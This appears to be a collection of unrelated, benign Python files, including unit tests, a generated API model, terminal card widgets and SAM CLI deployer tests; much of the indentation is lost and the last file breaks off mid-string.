cp_mat_folder_dir = os.path.join(home_dir_data, 'dataset_cp_mat')
pose_result_folder_dir = os.path.join(home_dir_data, 'collection_result')
seq_result_folder_dir = os.path.join(args.home_dir_data, 'collection_result_seq')
out_dir = os.path.join(home_dir_data, 'result_name_n_pose_dict.csv')
all_data = {}
ct = 0
for cp_result_file in os.listdir(cp_result_folder_dir):
result_file_dir = os.path.join(cp_result_folder_dir, cp_result_file)
if os.path.getsize(result_file_dir) == 0:
continue
result_file_name = cp_result_file[:-5]
# pose_result_file = '{}.txt'.format(result_file_name)
# pose_result_file_dir = os.path.join(pose_result_folder_dir, pose_result_file)
# assert os.path.isfile(pose_result_file_dir)
#import time
#a = time.time()
try:
with open(result_file_dir) as f:
pose_idx = [tmp['index'] for tmp in json.load(f)]
except:
continue
#b = time.time()
final_pose_idx = []
for i, k in enumerate(pose_idx):
# result_json_dir = os.path.join(seq_result_folder_dir, result_file_name + '-' + str(k) + '.json')
np_dir = os.path.join(seq_result_folder_dir, result_file_name + '-' + str(k) + '-0-pose.npy')
if os.path.exists(np_dir):
final_pose_idx.append(i)
#print(i, pose_idx)
#assert i in pose_idx
#print(time.time() - b, b-a)
all_data[result_file_name] = final_pose_idx
ct += 1
print(result_file_dir, final_pose_idx, ct)
if ct % 500 == 0:
# break
print('writing...', len(all_data))
w = csv.writer(open(out_dir, "w+"))
for key, val in all_data.items():
w.writerow([key, *val])
print('writing...', len(all_data))
w = csv.writer(open(out_dir, "w+"))
for key, val in all_data.items():
w.writerow([key, *val])
|
python
|
import unittest
from Calculator import Calculator
from CsvReader.CSVReader import CsvReader
class MyTestCase(unittest.TestCase):
def test_instantiate_calculator(self):
calculator = Calculator()
self.assertIsInstance(calculator, Calculator)
def test_addition_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Addition.csv").data
for test_case in test_cases:
self.assertEqual(calculator.add(int(test_case['Value 2']), int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Addition!")
def test_multiplication_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Multiplication.csv").data
for test_case in test_cases:
self.assertEqual(calculator.multiply(int(test_case['Value 2']), int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Multiplication!")
def test_subtraction_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Subtraction.csv").data
for test_case in test_cases:
self.assertEqual(calculator.subtract(int(test_case['Value 2']), int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Subtraction!")
def test_squaring_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square.csv").data
for test_case in test_cases:
self.assertEqual(calculator.square(int(test_case['Value 1'])), int(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Squaring!")
def test_square_root_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square Root.csv").data
for test_case in test_cases:
self.assertEqual(calculator.sqrt(int(test_case['Value 1'])), float(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Square Root!")
def test_division_method(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Division.csv").data
for test_case in test_cases:
self.assertEqual(calculator.divide(int(test_case['Value 2']), int(test_case['Value 1'])), float(test_case['Result']))
print(len(test_cases), " TestFiles cases passed for Division!")
def test_results_property_add(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Addition.csv").data
for test_case in test_cases:
self.assertEqual(calculator.add(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Addition) static variable :: result passed!")
def test_results_property_sub(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Subtraction.csv").data
for test_case in test_cases:
self.assertEqual(calculator.subtract(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Subtraction) static variable :: result passed!")
def test_results_property_mul(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Multiplication.csv").data
for test_case in test_cases:
self.assertEqual(calculator.multiply(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Multiplication) static variable :: result passed!")
def test_results_property_div(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Division.csv").data
for test_case in test_cases:
self.assertEqual(calculator.divide(int(test_case['Value 2']), int(test_case['Value 1'])), calculator.result)
print("Test cases (Division) static variable :: result passed!")
def test_results_property_square(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square.csv").data
for test_case in test_cases:
self.assertEqual(calculator.square(int(test_case['Value 1'])), calculator.result)
print("Test cases (Squaring) static variable :: result passed!")
def test_results_property_square_root(self):
calculator = Calculator()
test_cases = CsvReader("TestFiles/BasicFunctions/Unit Test Square Root.csv").data
for test_case in test_cases:
self.assertEqual(calculator.sqrt(int(test_case['Value 1'])), calculator.result)
print("Test cases (Square Root) static variable :: result passed!")
if __name__ == '__main__':
unittest.main()
|
python
|
import numpy as np
import pandas as pd
import xarray as xr
import cubepy
from pyplan_engine.classes.evaluators.BaseEvaluator import BaseEvaluator
from pyplan_engine.classes.evaluators.CubepyEvaluator import CubepyEvaluator
from pyplan_engine.classes.evaluators.IPythonEvaluator import IPythonEvaluator
from pyplan_engine.classes.evaluators.NumpyEvaluator import NumpyEvaluator
from pyplan_engine.classes.evaluators.PandasEvaluator import PandasEvaluator
from pyplan_engine.classes.evaluators.XArrayEvaluator import XArrayEvaluator
from pyplan_engine.classes.evaluators.BokehEvaluator import BokehEvaluator
from pyplan_engine.classes.evaluators.PlotlyEvaluator import PlotlyEvaluator
from pyplan_engine.classes.evaluators.MatplotlibEvaluator import MatplotlibEvaluator
from pyplan_engine.classes.XHelpers import XIndex
from bokeh.plotting import Figure
from bokeh.layouts import LayoutDOM
from plotly.graph_objs._figure import Figure as PlotlyFigure
import inspect
from matplotlib.artist import Artist as MatplotlibArtist
class Evaluator(object):
    ipythonMethods = ["_repr_html_", "_repr_json_",
                      "_repr_jpeg_", "_repr_png_", "_repr_pretty_"]
@staticmethod
def createInstance(result):
if result is None:
return BaseEvaluator()
else:
if isinstance(result, pd.DataFrame) or isinstance(result, pd.Series) or isinstance(result, pd.Index):
return PandasEvaluator()
elif isinstance(result, xr.DataArray) or isinstance(result, XIndex):
return XArrayEvaluator()
elif isinstance(result, MatplotlibArtist) or inspect.ismodule(result) and "matplotlib.pyplot" in str(result) or isinstance(result, np.ndarray) and len(result) > 0 and isinstance(result.item(0), MatplotlibArtist):
return MatplotlibEvaluator()
elif isinstance(result, np.ndarray):
return NumpyEvaluator()
elif isinstance(result, Figure) or isinstance(result, LayoutDOM):
return BokehEvaluator()
            elif isinstance(result, PlotlyFigure):
return PlotlyEvaluator()
elif isinstance(result, cubepy.Cube) or isinstance(result, cubepy.Index):
return CubepyEvaluator()
else:
_dir = dir(result)
                if len(list(set(_dir) & set(Evaluator.ipythonMethods))) > 0:
return IPythonEvaluator()
else:
return BaseEvaluator()
|
python
|
#! /usr/bin/env python
# $Id: test_class.py 5174 2007-05-31 00:01:52Z wiemann $
# Author: Lea Wiemann <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
Tests for the 'class' directive.
"""
from __init__ import DocutilsTestSupport
def suite():
s = DocutilsTestSupport.ParserTestSuite()
s.generateTests(totest)
return s
totest = {}
totest['class'] = [
["""\
.. class:: class1 class2
""",
"""\
<document source="test data">
<pending>
.. internal attributes:
.transform: docutils.transforms.misc.ClassAttribute
.details:
class: ['class1', 'class2']
directive: 'class'
"""],
["""\
.. class:: class1 class2
The classes are applied to this paragraph.
And this one.
""",
"""\
<document source="test data">
<paragraph classes="class1 class2">
The classes are applied to this paragraph.
<paragraph classes="class1 class2">
And this one.
"""],
]
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
|
python
|
# coding:utf-8
# Crop the frames into small slices and save them
import tkFileDialog
import cv2
from configurationInjection import configInjection
import os
config = configInjection()
config.loadConfiguration()
rois = config.rois[0]
flag = True
videopath = tkFileDialog.askopenfilename(initialdir="/home/zb/myfile/cutSave")
count = 0
cap = cv2.VideoCapture(videopath)
while flag:
    flag, img = cap.read()
    if not flag:
        # stop when no more frames can be read (img would be None)
        break
basePath = "/home/zb/myfile/cutSave/1-1"
framesBasePath = "/home/zb/myfile/cutSave/1-1/frames7"
if not os.path.exists(basePath):
os.mkdir(basePath)
if not os.path.exists(framesBasePath):
os.mkdir(framesBasePath)
bigSlice = img[360:1080, 480:1440]
# cv2.imwrite(basePath + "/" + str(count) + ".jpg", bigSlice)
for roi in rois:
slice = img[roi[2]:roi[3], roi[0]:roi[1]]
count += 1
cv2.imwrite(framesBasePath + "/" + str(count) + ".jpg", slice)
cap.release()
|
python
|
# -*- coding: utf-8 -*-
"""form base classes for aloha-editor integration"""
import floppyforms as forms
from djaloha.widgets import AlohaInput
from django.utils.encoding import smart_unicode
class DjalohaForm(forms.Form):
"""Base class for form with aloha editor"""
def __init__(self, model_class, lookup, field_name, data=None, field_value=None, *args, **kwargs):
super(DjalohaForm, self).__init__(data, *args, **kwargs)
self._model_class = model_class
self._lookup = lookup
self._field_name = field_name
model_name = "__".join(
(model_class.__module__.split('.')[-2], model_class.__name__)
)
lookup_str = "__".join([k + "__" + unicode(v).strip('"\'') for (k, v) in lookup.items()])
self._form_field = "__".join(
("djaloha", model_name, lookup_str, field_name)
)
self.fields[self._form_field] = forms.CharField(
required=False,
initial=field_value,
widget=AlohaInput()
)
def save(self):
"""save associated object"""
value = smart_unicode(self.cleaned_data[self._form_field])
obj = self._model_class.objects.get_or_create(**self._lookup)[0]
setattr(obj, self._field_name, value)
obj.save()
def as_is(self):
"""return html without parent tag"""
return self._html_output(
normal_row=u'%(field)s',
error_row=u'%s',
row_ender='',
help_text_html=u'',
errors_on_separate_row=True
)
|
python
|
"""Replays
RocketLeagueReplays API module
"""
import requests
BASE_URL = 'https://www.rocketleaguereplays.com/api/replays/?page='
def get_replays(page_num):
"""
Requests a page of replay data from the RocketLeagueReplaysAPI
:param page_num: Page number to request
:return: list of matches returned
"""
url = f'{BASE_URL}{page_num}'
result = requests.get(url).json()
matches = result['results']
return matches
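# --- Hedged usage sketch (added; not part of the original module) ---
# Fetches a single page and inspects a few matches. The 'id' key is an
# assumption about the API payload; adjust to the actual schema if it differs.
def example_print_first_page():
    matches = get_replays(page_num=1)
    for match in matches[:5]:
        print(match.get('id'))
    return matches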
|
python
|
# -*- coding: utf-8 -*-
import urwid
PALETTE = [
('red', 'dark red', ''),
('selectedred', 'dark red', 'yellow'),
('selected', '', 'yellow'),
]
# Modify these as needed
SIZES = {'small': (4, 3), 'medium': (6, 4), 'large': (8, 6)}
card_size = 'large'
class BaseCardWidget(urwid.WidgetWrap):
def __init__(self, *args, **kw):
self.card_columns, self.card_rows = SIZES[card_size]
super(BaseCardWidget, self).__init__(*args, **kw)
self.redraw()
def redraw(self):
self.text.set_text(self._draw_card_text())
def _draw_card_text(self):
raise NotImplementedError
class SpacerWidget(BaseCardWidget):
def __init__(self, **kw):
self.text = urwid.Text('', wrap='clip')
super(SpacerWidget, self).__init__(self.text)
def _draw_card_text(self):
# The decrement of rows is to account for expanding space in
# the vertical direction
return [u' '* self.card_columns +'\n'] * (self.card_rows-1)
class EmptyCardWidget(BaseCardWidget):
def __init__(self, onclick=None, **kw):
self.onclick = onclick
self.text = urwid.Text('', wrap='clip')
super(EmptyCardWidget, self).__init__(self.text)
def _draw_card_text(self):
return [
u'╭' + u'─' * (self.card_columns-2) + u'╮\n'
+ (self.card_rows-2) * (u'│'+ ' ' * (self.card_columns-2) + u'│\n')
+ u'╰' + u'─' * (self.card_columns-2) + u'╯\n'
]
def selectable(self):
return bool(self.onclick)
def mouse_event(self, size, event, button, col, row, focus):
if event == 'mouse press':
if self.onclick:
self.onclick(self)
def iter_widgets(self):
return iter([])
class CardWidget(BaseCardWidget):
def __init__(self, card, row_index, col_index, onclick=None):
self._card = card
self.row_index = row_index
self.col_index = col_index
self.text = urwid.Text('', wrap='clip')
self.highlighted = False
self.onclick = onclick
super(CardWidget, self).__init__(self.text)
def __repr__(self):
return '{}(card={!r}, highlighted={!r}, ...)'.format(
self.__class__.__name__, self.card, self.highlighted,
)
def mouse_event(self, size, event, button, col, row, focus):
if event == 'mouse press':
if self.onclick:
self.onclick(self)
def _draw_card_text(self):
columns, rows = self.card_columns, self.card_rows
style = 'selected' if self.highlighted else ''
redornot = 'red' if self.card.suit in ('hearts', 'diamonds') else ''
if self.highlighted:
redornot = 'selected' + redornot
if not self.face_up:
face_down_middle_filling = (columns-2) * u'╬'
filling = [u'│', (style, face_down_middle_filling), u'│\n'] * (rows-2)
else:
rank, suit = (self.card.rank, self.card.suit_symbol)
spaces = (columns-5) * ' '
filling = [u'│', (redornot, u'{}{}{}'.format(rank.ljust(2), spaces, suit)), u'│\n']
filling += (
[u'│', (style, u' ' * (columns-2)), u'│\n'] * (rows-4) +
[u'│', (redornot, u'{}{}{}'.format(suit, spaces,rank.rjust(2))), u'│\n']
)
top = u'╭'+ u'─' * (columns-2) + u'╮\n'
text = [top] + filling
text += [u'╰' + u'─' * (columns-2) + u'╯\n']
if isinstance(text[-1], tuple):
text[-1] = text[-1][0], text[-1][1].strip()
else:
text[-1] = text[-1].strip()
return text
@property
def card(self):
return self._card
@card.setter
def card(self, card):
self._card = card
self.redraw()
@property
def face_up(self):
return self.card.face_up
@face_up.setter
def face_up(self, val):
self.card.face_up = bool(val)
self.redraw()
|
python
|
# coding: utf-8
"""
ELEMENTS API
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from elements_sdk.configuration import Configuration
class TapeFile(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'int',
'tape': 'Tape',
'path': 'str',
'search_highlight': 'str',
'uid': 'int',
'name': 'str',
'is_dir': 'bool',
'read_only': 'bool',
'length': 'int',
'checksum': 'str',
'fullpath': 'str',
'parent': 'int'
}
attribute_map = {
'id': 'id',
'tape': 'tape',
'path': 'path',
'search_highlight': 'search_highlight',
'uid': 'uid',
'name': 'name',
'is_dir': 'is_dir',
'read_only': 'read_only',
'length': 'length',
'checksum': 'checksum',
'fullpath': 'fullpath',
'parent': 'parent'
}
def __init__(self, id=None, tape=None, path=None, search_highlight=None, uid=None, name=None, is_dir=None, read_only=None, length=None, checksum=None, fullpath=None, parent=None, local_vars_configuration=None): # noqa: E501
"""TapeFile - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._tape = None
self._path = None
self._search_highlight = None
self._uid = None
self._name = None
self._is_dir = None
self._read_only = None
self._length = None
self._checksum = None
self._fullpath = None
self._parent = None
self.discriminator = None
if id is not None:
self.id = id
if tape is not None:
self.tape = tape
self.path = path
if search_highlight is not None:
self.search_highlight = search_highlight
self.uid = uid
self.name = name
if is_dir is not None:
self.is_dir = is_dir
if read_only is not None:
self.read_only = read_only
if length is not None:
self.length = length
self.checksum = checksum
self.fullpath = fullpath
self.parent = parent
@property
def id(self):
"""Gets the id of this TapeFile. # noqa: E501
:return: The id of this TapeFile. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this TapeFile.
:param id: The id of this TapeFile. # noqa: E501
:type: int
"""
self._id = id
@property
def tape(self):
"""Gets the tape of this TapeFile. # noqa: E501
:return: The tape of this TapeFile. # noqa: E501
:rtype: Tape
"""
return self._tape
@tape.setter
def tape(self, tape):
"""Sets the tape of this TapeFile.
:param tape: The tape of this TapeFile. # noqa: E501
:type: Tape
"""
self._tape = tape
@property
def path(self):
"""Gets the path of this TapeFile. # noqa: E501
:return: The path of this TapeFile. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this TapeFile.
:param path: The path of this TapeFile. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and path is None: # noqa: E501
raise ValueError("Invalid value for `path`, must not be `None`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
path is not None and len(path) < 1):
raise ValueError("Invalid value for `path`, length must be greater than or equal to `1`") # noqa: E501
self._path = path
@property
def search_highlight(self):
"""Gets the search_highlight of this TapeFile. # noqa: E501
:return: The search_highlight of this TapeFile. # noqa: E501
:rtype: str
"""
return self._search_highlight
@search_highlight.setter
def search_highlight(self, search_highlight):
"""Sets the search_highlight of this TapeFile.
:param search_highlight: The search_highlight of this TapeFile. # noqa: E501
:type: str
"""
self._search_highlight = search_highlight
@property
def uid(self):
"""Gets the uid of this TapeFile. # noqa: E501
:return: The uid of this TapeFile. # noqa: E501
:rtype: int
"""
return self._uid
@uid.setter
def uid(self, uid):
"""Sets the uid of this TapeFile.
:param uid: The uid of this TapeFile. # noqa: E501
:type: int
"""
if self.local_vars_configuration.client_side_validation and uid is None: # noqa: E501
raise ValueError("Invalid value for `uid`, must not be `None`") # noqa: E501
self._uid = uid
@property
def name(self):
"""Gets the name of this TapeFile. # noqa: E501
:return: The name of this TapeFile. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this TapeFile.
:param name: The name of this TapeFile. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and name is None: # noqa: E501
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
name is not None and len(name) > 255):
raise ValueError("Invalid value for `name`, length must be less than or equal to `255`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
name is not None and len(name) < 1):
raise ValueError("Invalid value for `name`, length must be greater than or equal to `1`") # noqa: E501
self._name = name
@property
def is_dir(self):
"""Gets the is_dir of this TapeFile. # noqa: E501
:return: The is_dir of this TapeFile. # noqa: E501
:rtype: bool
"""
return self._is_dir
@is_dir.setter
def is_dir(self, is_dir):
"""Sets the is_dir of this TapeFile.
:param is_dir: The is_dir of this TapeFile. # noqa: E501
:type: bool
"""
self._is_dir = is_dir
@property
def read_only(self):
"""Gets the read_only of this TapeFile. # noqa: E501
:return: The read_only of this TapeFile. # noqa: E501
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""Sets the read_only of this TapeFile.
:param read_only: The read_only of this TapeFile. # noqa: E501
:type: bool
"""
self._read_only = read_only
@property
def length(self):
"""Gets the length of this TapeFile. # noqa: E501
:return: The length of this TapeFile. # noqa: E501
:rtype: int
"""
return self._length
@length.setter
def length(self, length):
"""Sets the length of this TapeFile.
:param length: The length of this TapeFile. # noqa: E501
:type: int
"""
self._length = length
@property
def checksum(self):
"""Gets the checksum of this TapeFile. # noqa: E501
:return: The checksum of this TapeFile. # noqa: E501
:rtype: str
"""
return self._checksum
@checksum.setter
def checksum(self, checksum):
"""Sets the checksum of this TapeFile.
:param checksum: The checksum of this TapeFile. # noqa: E501
:type: str
"""
if (self.local_vars_configuration.client_side_validation and
checksum is not None and len(checksum) > 255):
raise ValueError("Invalid value for `checksum`, length must be less than or equal to `255`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
checksum is not None and len(checksum) < 1):
raise ValueError("Invalid value for `checksum`, length must be greater than or equal to `1`") # noqa: E501
self._checksum = checksum
@property
def fullpath(self):
"""Gets the fullpath of this TapeFile. # noqa: E501
:return: The fullpath of this TapeFile. # noqa: E501
:rtype: str
"""
return self._fullpath
@fullpath.setter
def fullpath(self, fullpath):
"""Sets the fullpath of this TapeFile.
:param fullpath: The fullpath of this TapeFile. # noqa: E501
:type: str
"""
if (self.local_vars_configuration.client_side_validation and
fullpath is not None and len(fullpath) > 4095):
raise ValueError("Invalid value for `fullpath`, length must be less than or equal to `4095`") # noqa: E501
if (self.local_vars_configuration.client_side_validation and
fullpath is not None and len(fullpath) < 1):
raise ValueError("Invalid value for `fullpath`, length must be greater than or equal to `1`") # noqa: E501
self._fullpath = fullpath
@property
def parent(self):
"""Gets the parent of this TapeFile. # noqa: E501
:return: The parent of this TapeFile. # noqa: E501
:rtype: int
"""
return self._parent
@parent.setter
def parent(self, parent):
"""Sets the parent of this TapeFile.
:param parent: The parent of this TapeFile. # noqa: E501
:type: int
"""
self._parent = parent
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TapeFile):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TapeFile):
return True
return self.to_dict() != other.to_dict()
|
python
|
from unittest import mock
from django import forms
from django.test import SimpleTestCase
from django.utils.functional import lazy
from phonenumber_field.formfields import PhoneNumberField
ALGERIAN_PHONE_NUMBER = "+213799136332"
class PhoneNumberFormFieldTest(SimpleTestCase):
def test_error_message(self):
class PhoneNumberForm(forms.Form):
number = PhoneNumberField()
form = PhoneNumberForm({"number": "invalid"})
self.assertIs(form.is_valid(), False)
self.assertEqual(
form.errors, {"number": ["Enter a valid phone number (e.g. +12125552368)."]}
)
def test_override_error_message(self):
class MyPhoneNumberField(PhoneNumberField):
default_error_messages = {"invalid": "MY INVALID MESSAGE!"}
class PhoneNumberForm(forms.Form):
number = MyPhoneNumberField()
form = PhoneNumberForm({"number": "invalid"})
self.assertIs(form.is_valid(), False)
self.assertEqual(form.errors, {"number": ["MY INVALID MESSAGE!"]})
def test_override_error_message_inline(self):
class PhoneNumberForm(forms.Form):
number = PhoneNumberField(
error_messages={"invalid": "MY INLINE INVALID MESSAGE!"}
)
form = PhoneNumberForm({"number": "invalid"})
self.assertIs(form.is_valid(), False)
self.assertEqual(form.errors, {"number": ["MY INLINE INVALID MESSAGE!"]})
def test_algerian_phone_number_in_form(self):
class PhoneNumberForm(forms.Form):
number = PhoneNumberField()
form = PhoneNumberForm({"number": ALGERIAN_PHONE_NUMBER})
self.assertTrue(form.is_valid())
self.assertEqual(ALGERIAN_PHONE_NUMBER, form.cleaned_data["number"])
def test_error_message_lazy(self):
def fail_gettext(msgid):
raise Exception("gettext was called unexpectedly.")
with mock.patch(
"phonenumber_field.formfields._",
side_effect=lazy(fail_gettext, str),
):
PhoneNumberField()
|
python
|
from pkg.command.azcli_cmd import AzCliCommand
from pkg.entity._az_cli import AzCli
from pkg.executor._executor import Executor
from pkg.executor.azcli.command._azcli_cmd_executor import AzCliCommandExecutor
class AzCliExecutor(Executor):
def __init__(self):
pass
def run_az_cli(self, cmd: AzCli):
az_cli_command = AzCliCommand(cmd)
az_cli_cmd_executor = AzCliCommandExecutor(az_cli_command)
return az_cli_cmd_executor.execute()
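# Illustrative usage sketch only -- the AzCli constructor and the shape of the
# returned value are assumptions, not taken from this file:
#
#   executor = AzCliExecutor()
#   result = executor.run_az_cli(some_az_cli)  # some_az_cli is an AzCli instance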
|
python
|
from typing import Container, Iterable, Union
import uuid
import time
import math
from datetime import datetime, timedelta, timezone
from unittest import TestCase
from unittest.mock import patch, MagicMock, ANY, call
from botocore.exceptions import ClientError, WaiterError, BotoCoreError
from samcli.commands.deploy.exceptions import (
DeployFailedError,
ChangeSetError,
DeployStackOutPutFailedError,
DeployBucketInDifferentRegionError,
)
from samcli.lib.deploy.deployer import Deployer
from samcli.lib.package.s3_uploader import S3Uploader
from samcli.lib.utils.time import utc_to_timestamp, to_datetime
class MockPaginator:
def __init__(self, resp):
self.resp = resp
def paginate(self, ChangeSetName=None, StackName=None):
return self.resp
class MockChangesetWaiter:
def __init__(self, ex=None):
self.ex = ex
def wait(self, ChangeSetName, StackName, WaiterConfig):
if self.ex:
raise self.ex
return
class MockCreateUpdateWaiter:
def __init__(self, ex=None):
self.ex = ex
def wait(self, StackName, WaiterConfig):
if self.ex:
raise self.ex
return
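# The three mock classes above stand in for the boto3 CloudFormation paginator and
# waiters used by Deployer in these tests: MockPaginator returns a pre-canned list of
# pages, while the waiter mocks either return immediately or raise the exception they
# were constructed with.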
class CustomTestCase(TestCase):
def assertListSubset(self, l1: Iterable, l2: Union[Iterable, Container], msg=None) -> None:
"""
Assert l2 contains all items in l1.
Just like calling self.assertIn(l1[x], l2) in a loop.
"""
for x in l1:
self.assertIn(x, l2, msg)
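# For example (illustrative only): assertListSubset(["a"], ["a", "b"]) passes,
# while assertListSubset(["c"], ["a", "b"]) fails because "c" is not in l2.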
class TestDeployer(CustomTestCase):
def setUp(self):
self.session = MagicMock()
self.cloudformation_client = self.session.client("cloudformation")
self.s3_client = self.session.client("s3")
self.deployer = Deployer(self.cloudformation_client)
def test_deployer_init(self):
self.assertEqual(self.deployer._client, self.cloudformation_client)
self.assertEqual(self.deployer.changeset_prefix, "samcli-deploy")
def test_deployer_init_custom_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=10)
self.assertEqual(deployer.client_sleep, 10)
def test_deployer_init_custom_sleep_invalid(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep="INVALID")
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_negative(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=-5)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_zero(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=0)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_default_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"))
self.assertEqual(deployer.client_sleep, 0.5)
def test_deployer_has_no_stack(self):
self.deployer._client.describe_stacks = MagicMock(return_value={"Stacks": []})
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_in_review(self):
self.deployer._client.describe_stacks = MagicMock(
return_value={"Stacks": [{"StackStatus": "REVIEW_IN_PROGRESS"}]}
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception_non_existent(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Stack with id test does not exist"}},
operation_name="stack_status",
)
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=Exception())
with self.assertRaises(Exception):
self.deployer.has_stack("test")
def test_deployer_has_stack_exception_botocore(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=BotoCoreError())
with self.assertRaises(DeployFailedError):
self.deployer.has_stack("test")
def test_create_changeset(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_update_changeset(self):
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="UPDATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_create_changeset_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(side_effect=Exception)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException(self):
error_message = (
"An error occurred (ValidationError) when calling the CreateChangeSet "
"operation: S3 error: The bucket you are attempting to access must be "
"addressed using the specified endpoint. "
"Please send all future requests to this "
"endpoint.\nFor more information "
